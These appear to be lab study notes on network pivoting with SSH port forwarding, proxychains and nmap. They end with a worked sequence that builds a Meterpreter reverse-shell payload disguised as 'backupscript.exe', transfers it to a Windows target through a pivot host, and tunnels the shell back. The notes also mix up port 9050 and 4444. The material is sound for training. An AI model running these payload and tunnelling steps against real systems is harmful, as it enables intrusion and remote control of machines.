Local Port Forward
Enables us to simulate a remote service by sending traffic on a local port (33306) to a remote port (3306) over SSH.
We cannot access the MySQL server on the Target Host.
Shelled@htb[/htb]$ nmap -sT -p22,3306 10.129.202.64
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:12 EST
Nmap scan report for 10.129.202.64
Host is up (0.12s latency).
PORT STATE SERVICE
22/tcp open ssh
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
To access the MySQL service, we can either SSH into the server and access MySQL from inside the Target Host, or we can port forward it to our localhost on port `33306` and access it locally.
Shelled@htb[/htb]$ ssh -L 33306:localhost:3306 Target@10.129.202.64
The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `33306` to `localhost:3306` on the Target Host.
Dynamic Port Forwarding
Enables us to simulate a remote host locally by sending traffic on a local port (4444) to a remote host over SSH.
We have RCE on Target Host (10.10.15.6). This is the Target Host's Network Interface Information.
ubuntu@WEB01:~$ ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.202.64 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:52eb prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:52eb prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:52:eb txqueuelen 1000 (Ethernet)
RX packets 35571 bytes 177919049 (177.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10452 bytes 1474767 (1.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.5.129 netmask 255.255.254.0 broadcast 172.16.5.255
inet6 fe80::250:56ff:feb9:a9aa prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:a9:aa txqueuelen 1000 (Ethernet)
RX packets 8251 bytes 1125190 (1.1 MB)
RX errors 0 dropped 40 overruns 0 frame 0
TX packets 1538 bytes 123584 (123.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 270 bytes 22432 (22.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 270 bytes 22432 (22.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
We want to do an nmap scan on (172.16.5.129). To do this we need to start an SSH server with dynamic port forwarding enabled.
Shelled@htb[/htb]$ ssh -D 4444 ubuntu@10.129.202.64
To inform proxychains that we must use port 9050, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks4 127.0.0.1 4444` to the last line if it is not already there.
Shelled@htb[/htb]$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 4444
Shelled@htb[/htb]$ proxychains nmap -v -sn 172.16.5.1-200
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:30 EST
Initiating Ping Scan at 12:30
Scanning 10 hosts [2 ports/host]
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.2:80-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.5:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.6:80-<--timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
<SNIP>
Remote Port Forwarding
Enables us to simulate a 2 layer deep remote host locally by sending traffic on local port (4444) to the Pivot Host which will send that traffic to the Target Host.
Create reverse shell payload that will be executed on Target Host.
Shelled@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8888
Listen on Attack Host for reverse shell
msf6 > use exploit/multi/handler
Transfer payload from Attack Host to Pivot Host
Shelled@htb[/htb]$ scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
Transfer payload from Pivot Host to Target Host (1)
ubuntu@Webserver$ python3 -m http.server 8123
Transfer payload from Pivot Host to Target Host (2)
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Pivot Host will listen on port 8888 and forward all incoming connections to port 4444 on Attack Host.
Shelled@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8888:0.0.0.0:4444 ubuntu@<ipAddressofTarget> -vN